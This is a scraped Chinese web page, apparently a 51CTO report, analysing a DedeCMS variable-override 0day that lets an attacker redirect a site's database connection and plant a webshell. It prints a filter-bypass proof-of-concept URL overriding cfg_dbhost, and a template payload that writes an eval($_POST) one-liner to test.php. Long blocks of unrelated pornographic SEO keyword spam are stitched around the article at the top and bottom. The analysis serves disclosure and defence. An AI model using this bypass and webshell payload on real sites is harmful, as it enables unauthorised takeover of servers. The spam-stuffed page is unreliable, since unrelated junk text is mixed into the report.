精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Dede GetWebShell 0Day漏洞分析報告

安全
DedeCMS的漏洞成因主要是由于變量覆蓋導致而成,攻擊者通過通過提交變量,覆蓋數據庫連接配置的全局變量,從而可以使被攻擊的網站反向連接攻擊者指定的數據庫,讀取指定的內容,并在被攻擊的網站中直接寫入WebShell。

51CTO.com綜合報道】

事件背景:

近日很多網站被爆遭到入侵,經過安全寶安全實驗室研究分析,這些網站使用的都是DedeCMS內容管理系統,DedeCMS爆出一個很嚴重的漏洞,攻擊者可以直接向服務器中寫入"一句話木馬"。

DedeCMS的漏洞成因主要是由于變量覆蓋導致而成,攻擊者通過通過提交變量,覆蓋數據庫連接配置的全局變量,從而可以使被攻擊的網站反向連接攻擊者指定的數據庫,讀取指定的內容,并在被攻擊的網站中直接寫入WebShell。從整個攻擊過程來看,這種攻擊利用方式也比較巧妙,避開了傳統的注入,破解,登錄后臺和上傳木馬的攻擊模式,攻擊者可以在未授權的前提下直接向網站目錄中寫入WebShell,從而控制網站,危害嚴重。

隨著網站管理員的安全意識的逐漸提高,網絡安全設備的引入,模塊和程序的過濾;傳統的入侵模式也越來越捉襟見肘,從這次攻擊中,我們發現傳統的Web攻擊思想也在發生變換,它們正慢慢由正向攻擊向反向攻擊過渡,其實在系統的攻擊中,反向攻擊早就存在,攻擊者為了繞過防火墻一些列的前端過濾設備,利用木馬使被攻擊機器自己發起連向攻擊者機器的請求,而防火墻通常是不會攔截機器主動發現的連接,從而攻擊者很容易繞過了前端一系列的過濾和障礙。

分析報告:

下面我們一起來看下Dede的漏洞原因,首先我們來看個變量覆蓋漏洞的原型基礎:

VulTest.php:

<?php

$anquanbao="imiyoo_first";

foreach($_GET  as $key=>$value)

$$key=$value;

echo "\$anquanbao=".$anquanbao;

?>

攻擊者顯然通過$_GET提交變量覆蓋已經定義的變量,效果如下圖:

攻擊前圖片

攻擊后圖片($anquanbao變量已經被覆蓋)

有了這個漏洞的基礎,現在我們來看看Dede的漏洞詳細信息,漏洞主要發生在文件/plus/mytag_js.php中:

我們首先讀下這段代碼的處理流程,程序在開始會獲取用戶提交的$aid變量,如果需要顯示不需要顯示緩存內容,則會從數據庫表'#@_mytag'中讀取記錄,并將讀取的$tagbody內容以Dede模版形式寫入緩存文件中。

在這里很顯然存在變量$aid的注入漏洞,但由于該表的內容一般都為空,而且Dede對提交的單引號都會有過濾,基本屬于雞肋漏洞;但是如果結合變量覆蓋漏洞,攻擊者就可以利用該漏洞覆蓋數據庫配置文件的連接信息,將數據庫的連接重定向到攻擊者可以控制的一個數據庫,那么這樣攻擊者就能完全控制$tagbody的內容,而且在DedeCMS文章管理系統中,模版中是可以嵌入PHP代碼,也就是說攻擊者可以執行自己的PHP代碼,從而可以輕易地向服務器中寫入一句話木馬,達到攻擊的效果。

在對漏洞進行測試的時候,我們發現Dede產生變量覆蓋漏洞的代碼在/include/common.inc.php中,如下:

通過這段代碼我們可以對程序中的任何變量進行覆蓋,為了覆蓋數據庫配置文件中的變量,其實我們覆蓋$cfg_dbhost或$GLOBALS[cfg_dbhost]都可以,因此我們可以提交形如下面的測試代碼:

   Ø mytag_js.php?_GET[cfg_dbhost]=www.anquanbao.com

   Ø mytag_js.php?_GET[GLOBALS][cfg_dbhost]= www.anquanbao.com

不過DedeCMS對這種形式的攻擊也是有防范,但只是對提交的變量中的鍵值進行了判斷,代碼如下:

但是這個變量$_k只是對一維數據的鍵值進行判斷,而Dede對變量的提取卻是支持多維的,如果攻擊者提交的是多維的變量就可以很容易繞過,為了繞過正則的檢測,同時達到覆蓋變量的效果;因此我們可以很容易想到$_COOKIE變量,更重要的是Dede也支持$_COOKIE提交變量,因此我們就可以得到如下的有效攻擊代碼: 

Ø mytag_js.php?_GET[_COOKIE][GLOBALS][cfg_dbhost]=www.anquanbao.com

利用上面的代碼就可以繞過DedeCMS的正則檢測,同時可以覆蓋$GLOBALS[cfg_dbhost]變量。

分析總結:

通過對上面的分析,那么現在我們就能很清楚整個攻擊流程:

1 攻擊者會預先準備一個MySQL數據庫,數據庫中包含有一個表明為'#@_mytag'的數據表,其中'#@'是待攻擊數據庫的表前綴,并在表中插入一條記錄來控制$tagbody的內容,使其能夠寫入一句話木馬,而且Dede利用模版寫入一句話木馬的代碼如下:

{dede:php}

$fp = @fopen("test.php", \'a\');

@fwrite($fp, \'<?php eval($_POST[test]) ?>\');

echo "OK";

@fclose($fp);

{/dede:php}

2 提交變量覆蓋語句讀取表中指定的內容,即可在當前路徑下寫入一句話木馬。

鑒于很多使用DedeCMS的網站還沒有修補該漏洞,因此在這里就不公布危害性攻擊代碼。

安全建議:

許多程序員在對$_GET,$_POST或$_COOKIE獲取的變量處理中,進行了對多維數組變量的遞歸解析,但是卻在過濾的時候并沒有對每一維的鍵值進行判斷和檢測;例如,在本次爆出的Dede的0day,程序員就只考慮到檢測二維數組的鍵值,但是攻擊者卻可以通過提交三維數組生成COOKIE變量輕易繞過。因此程序員如果在保證程序能夠對多維變量進行解析的時候,同時也是需要對每一維的鍵值進行有效檢測和判斷。

 

責任編輯:守望幸福 來源: 51CTO.com
相關推薦

2015-05-20 16:34:14

2009-07-06 13:15:07

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2021-10-06 13:48:50

0day漏洞攻擊

2022-03-25 13:41:55

漏洞網絡攻擊Quantum(量子

2013-05-24 14:02:42

2022-03-30 09:09:39

漏洞網絡安全網絡攻擊

2015-07-08 13:52:18

2020-12-17 10:28:27

漏洞網絡攻擊網絡安全

2010-01-20 16:13:15

2021-07-14 17:17:45

0day漏洞惡意代碼

2011-02-28 09:34:55

2011-03-15 15:14:22

2009-09-09 08:54:50

2015-08-31 10:09:34

2010-09-01 15:18:04

2014-10-15 17:29:33

2009-11-29 16:53:17

2021-04-13 16:40:18

0Day漏洞遠程代碼

2021-07-27 11:01:02

Windows
點贊
收藏

51CTO技術棧公眾號

很污的网站在线观看| 国产不卡在线观看| 污视频在线观看免费网站| 色欧美激情视频在线| 久久激情综合网| 精品国偷自产在线视频99| 在线观看免费的av| 污污的网站在线看| 91尤物视频在线观看| 日韩av免费在线| 制服丨自拍丨欧美丨动漫丨| 日韩区一区二| 亚州成人在线电影| 欧美综合77777色婷婷| 一本一道精品欧美中文字幕| 欧美日本中文| 国产婷婷成人久久av免费高清| av免费网站观看| 福利视频在线| 2020国产精品| 国产三级精品网站| 国产成年人免费视频| 欧美极品中文字幕| 91麻豆精品国产91久久久| 妞干网在线播放| www.亚洲免费| a亚洲天堂av| 国产精品老牛影院在线观看| 久草免费在线观看视频| 免费欧美一区| 精品久久久久久亚洲综合网| 日本www.色| 高清电影在线免费观看| 国产欧美一区二区精品久导航| 亚洲一区二区日本| 国产黄网在线观看| 欧美日韩ab| 中文字幕在线国产精品| 中文字幕在线视频播放| 欧美大片1688网站| 亚洲成av人影院在线观看网| 五月婷婷综合色| www国产一区| 久久精品久久久精品美女| 97avcom| 性生交大片免费全黄| 台湾色综合娱乐中文网| 日韩一级欧美一级| 国产精品v日韩精品v在线观看| 91福利区在线观看| 亚洲欧美激情一区二区| 日韩免费电影一区二区三区| 日日夜夜精品免费| 国产一区二区在线看| 国产精品久久中文| 久久久久女人精品毛片九一| 精品9999| 欧美激情xxxx性bbbb| 亚洲 欧美 变态 另类 综合| 日韩电影免费网址| 日韩精品高清在线| 亚洲中文字幕无码一区| 91蝌蚪精品视频| 欧美大片在线观看| 老女人性生活视频| 国产一区二区三区| 555www色欧美视频| 日本不卡一区二区在线观看| 韩国精品视频在线观看| 欧美视频裸体精品| 国产乱子伦农村叉叉叉| 97人人在线视频| 亚洲国产成人av好男人在线观看| 永久免费网站视频在线观看| 成年人黄视频在线观看| 综合久久国产九一剧情麻豆| 日韩女优中文字幕| 国产污视频在线| 国产午夜精品一区二区三区四区| 欧美日韩国产综合视频在线| 你懂的视频在线免费| 91麻豆文化传媒在线观看| 狠狠色综合网站久久久久久久| 好吊色视频一区二区| 97久久人人超碰| 久久精品国产精品国产精品污| 日本福利在线观看| 久久夜色精品一区| 日本一区视频在线观看免费| 国产精品天堂| 亚洲欧洲三级电影| 神马欧美一区二区| 欧美激情视频在线播放| ㊣最新国产の精品bt伙计久久| 99精品视频网站| 欧美hdxxx| 精品福利一区二区| 久久国产色av免费观看| 成人黄色免费网站| 91麻豆精品国产91久久久久久| 久久久久国产免费| 国产一区二区在线| 久久精品99国产精品酒店日本 | 午夜欧美性电影| 91精品国产综合久久久久久豆腐| 国产精品久久久久7777按摩| 久久久久亚洲av无码专区喷水| 国产高清在线a视频大全| 精品久久久久久久中文字幕| 亚洲第一中文av| 深夜福利一区二区三区| 亚洲精美色品网站| 免费看日本黄色片| 黑丝一区二区三区| 国产成人免费av电影| 国产富婆一级全黄大片| 久久久久久影视| 糖心vlog在线免费观看| 成人私拍视频| 日韩午夜激情av| 成年人在线免费看片| 韩日成人在线| 91精品免费久久久久久久久| 青青草在线视频免费观看| 亚洲人成电影网站色mp4| 国产极品在线视频| 不卡的国产精品| 精品国产精品网麻豆系列| 亚洲国产无码精品| 婷婷激情图片久久| 午夜精品一区二区三区在线视频| 国产日韩在线免费观看| 国产麻豆一精品一av一免费| 欧美精品一区二区三区在线看午夜| 中文字幕在线观看日本| 亚洲成人精品一区二区| 91极品视频在线观看| 国产suv精品一区二区四区视频| 一本一道久久a久久精品逆3p| 精品亚洲永久免费| 久热成人在线视频| 久久久久久久久一区| 成人免费在线| 91福利在线导航| 国产伦精品一区三区精东| 香蕉综合视频| 欧美性视频网站| 亚洲男女视频在线观看| 日韩一区欧美小说| 奇米影音第四色| 久久99视频| 欧洲美女免费图片一区| 亚洲成人av综合| 亚洲精品videosex极品| 日韩大片一区二区| 日韩欧美字幕| 国产精品色婷婷视频| 天堂中文在线官网| 亚洲一区免费观看| 中文字幕天堂网| 狠狠入ady亚洲精品| 成人午夜激情免费视频| 黄色免费在线观看网站| 制服丝袜亚洲精品中文字幕| 一本在线免费视频| 蜜桃视频一区二区三区| 色中色综合成人| 欧美一区二区三区婷婷| 中文字幕日韩综合av| 国语对白做受69按摩| 欧美激情一二三区| 亚洲黄色小视频在线观看| 91免费精品| 亚洲一区二区三区香蕉| 羞羞的网站在线观看| 精品久久久久久久久久久久包黑料 | 久久黄色精品视频| 2欧美一区二区三区在线观看视频| 欧美一区二区中文字幕| 中文字幕亚洲影视| 国产精品扒开腿做爽爽爽的视频| 搞黄视频免费在线观看| 欧美日韩亚洲另类| 成人性生活毛片| 国产福利不卡视频| 国产精彩视频一区二区| 欧美三级午夜理伦三级在线观看 | 在线视频观看国产| 亚洲国产欧美一区二区三区同亚洲 | 日韩在线视频在线观看| 欧美人与物videos另类xxxxx| 国产精品高潮粉嫩av| 精品国产丝袜高跟鞋| 日韩一级黄色片| 日本视频www| 久久久久久99久久久精品网站| 国产欧美高清在线| 国产欧美一区二区三区精品观看 | 妺妺窝人体色www婷婷| 国产福利精品导航| 欧美aⅴ在线观看| 国产精品久久久久久麻豆一区软件| 91在线视频免费| 久草免费在线视频| 色久欧美在线视频观看| 精品人妻午夜一区二区三区四区| 婷婷综合久久一区二区三区| 男人的天堂官网| 成人精品国产福利| 三级在线免费看| 午夜久久99| 日本在线观看一区二区| 日韩一区二区三区色| 青草成人免费视频| 好吊日视频在线观看| 欧美大片拔萝卜| 国产精品午夜一区二区| 亚洲精品大片www| 亚洲高潮女人毛茸茸| 国产91精品免费| 亚洲免费999| 美女爽到呻吟久久久久| 香港三级日本三级a视频| 久久爱www成人| 春色成人在线视频| 成人黄色在线| 欧美在线视频导航| 国产黄色在线网站| 在线免费看av不卡| 天天综合网天天综合| 欧美一区二区视频网站| 中文字幕xxxx| 精品动漫一区二区| 久久99久久久| 亚洲欧美激情小说另类| 亚洲女人毛茸茸高潮| 91日韩在线专区| 波多野吉衣在线视频| 久久99国产精品麻豆| 日本黄网站免费| 国产精品日韩欧美一区| 青草视频在线观看视频| 亚洲男女av一区二区| 先锋影音亚洲资源| 欧美猛男同性videos| 久久精品久久精品国产大片| 伊人精品综合| 亚洲最大av网站| 91精品网站在线观看| 国产美女久久精品| 欧美日韩精品免费观看视欧美高清免费大片 | 国产免费亚洲高清| 亚洲综合在线电影| 国产成人精品最新| 姬川优奈av一区二区在线电影| 欧美在线影院在线视频| 日韩激情电影免费看| 91精品国产99| 女人高潮被爽到呻吟在线观看| 午夜精品视频在线| 国产精品蜜芽在线观看| 久久久久久久久久久亚洲| 青草在线视频| 欧美激情一区二区三区久久久| 国产在线观看av| 久久亚洲综合国产精品99麻豆精品福利| av电影在线播放高清免费观看| 亚洲网址你懂得| 超碰在线国产| 日韩在线免费高清视频| 免费黄网站在线播放| 久久成人精品电影| 特级毛片在线| 午夜精品免费视频| 欧美一区久久久| 91国内揄拍国内精品对白| a级大胆欧美人体大胆666| 国内外成人免费激情在线视频网站 | 日韩美女av在线| 婷婷婷国产在线视频| 精品国产三级电影在线观看| 国产视频手机在线观看| 5858s免费视频成人| 亚洲第一成年人网站| 日韩视频一区二区在线观看| 亚洲天堂五月天| 欧美视频一区在线| 91精品视频免费在线观看| 日本韩国欧美在线| 亚洲午夜无码久久久久| 欧美色精品天天在线观看视频| 这里只有精品9| 欧美美女直播网站| 亚洲欧美高清视频| 亚洲第一男人天堂| 国产综合在线观看| 久久黄色av网站| 色呦呦网站在线观看| 91av中文字幕| 欧美亚洲黄色| 国产日韩二区| 青青一区二区三区| 91精品国产吴梦梦| 亚洲欧美日韩视频二区| 亚洲国产成人va在线观看麻豆| 国产一区二区在线免费观看| 手机在线看片日韩| 亚洲少妇30p| 国产又黄又猛又粗又爽| 欧美精选午夜久久久乱码6080| 成人免费视频国产免费麻豆| 日韩电视剧在线观看免费网站| 第九色区av在线| 欧美激情欧美狂野欧美精品 | 欧美人妖在线观看| 波多野结衣三级在线| 亚洲伊人观看| 日本中文字幕有码| 亚洲国产精品高清| 玖玖爱免费视频| 亚洲图片欧美综合| 一区二区的视频| 精品中文字幕久久久久久| 日本免费在线观看| 日本精品一区二区三区在线播放视频| 国产精品麻豆| 日韩欧美视频一区二区三区四区| 黄色一区二区三区四区| 中文字幕22页| caoporm超碰国产精品| 日韩在线视频网址| 欧美午夜精品一区| 欧美色18zzzzxxxxx| 亚洲18私人小影院| 国产一区二区| 在线国产99| 久久久国产精品一区二区中文| 国产精品入口麻豆| 一区二区三区日韩精品| 日本三级欧美三级| 日韩视频不卡中文| 久久国产精品一区| 国产美女久久精品| 不卡av一区二区| 男女无套免费视频网站动漫| 91小视频免费看| 国产一级黄色av| 欧美一区国产二区| 黄色国产网站在线播放| 国产精品久久久久久影视 | 伊人久久亚洲影院| 久久婷婷中文字幕| 18成人在线观看| 五月婷婷激情五月| 亚洲午夜精品视频| 亚洲精品在线影院| 日韩妆和欧美的一区二区| 国产精品久久777777毛茸茸| 伊人色在线视频| 亚洲色图.com| 国产视频www| 久久久久久12| 日本在线成人| 大桥未久一区二区三区| 国产呦精品一区二区三区网站| 九九热久久免费视频| 欧美性猛交xxxxxxxx| av免费观看一区二区| 国产精品主播视频| 国产精品99视频| 91精品视频国产| 一区二区三区中文在线| 国精品人妻无码一区二区三区喝尿| 欧美精品video| 日韩欧美影院| av在线无限看| 中文字幕一区二区在线观看| 国产美女明星三级做爰| 综合136福利视频在线| **国产精品| 人人妻人人做人人爽| 91美女片黄在线观看91美女| 国内自拍视频在线播放| 日韩禁在线播放| 精品欧美一区二区三区在线观看| 手机看片福利永久国产日韩| 久久国产精品99精品国产| 手机在线免费看毛片| 日韩视频一区在线观看| 久热在线观看视频| 日本一区免费在线观看| 黄页视频在线91| 日本视频www| 色婷婷**av毛片一区| 日韩精品一区二区三区免费视频| 成品人视频ww入口| 欧美激情自拍偷拍| 国产高潮在线观看| 奇门遁甲1982国语版免费观看高清| 禁断一区二区三区在线|